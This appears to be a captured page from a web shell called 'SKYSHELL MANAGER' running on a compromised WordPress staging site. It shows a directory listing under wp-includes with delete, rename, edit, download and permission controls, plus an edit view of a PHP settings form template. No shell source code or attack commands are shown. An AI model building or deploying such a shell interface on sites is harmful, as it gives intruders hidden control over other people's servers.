📁
SKYSHELL MANAGER
PHP v8.2.31
Create
Create
Path:
root
/
home
/
thevaxnx
/
nativize.com
/
staging
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
wp-links-opml.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: phpsettings
<form name="phpsettingsform" action="../scripts/dophpsettings" method="POST" onSubmit="return delayed_submit();"> <input type="hidden" name="php_prefix" value="%php_prefix%" /> <table id="phptbl" width="95%" class="table table-striped sortable" border="0" cellpadding="5" cellspacing="0"> <tr class="row-%"> <th class="cell">Directive</th> <th class="cell">Info</th> <th colspan="2" class="cell-end">Value</th> </tr> <tbody> !@directives@! <tr> <td class="cell">%directive%</td> <td class="cell">%note%</td> <td class="cell" onClick="enablecontainedobj(this);"><span %input_hidden%><input %input_disabled% type="text" name="%directive%" value="%value%" size="35" /></span>%disabledtxt%</td> </tr> !@directives@! </tbody> </table> <br /> <div> <input type="submit" id="savebutton" class="btn-primary" value="Save"> <span id="savebutton_status"></span> </div> </form>
Save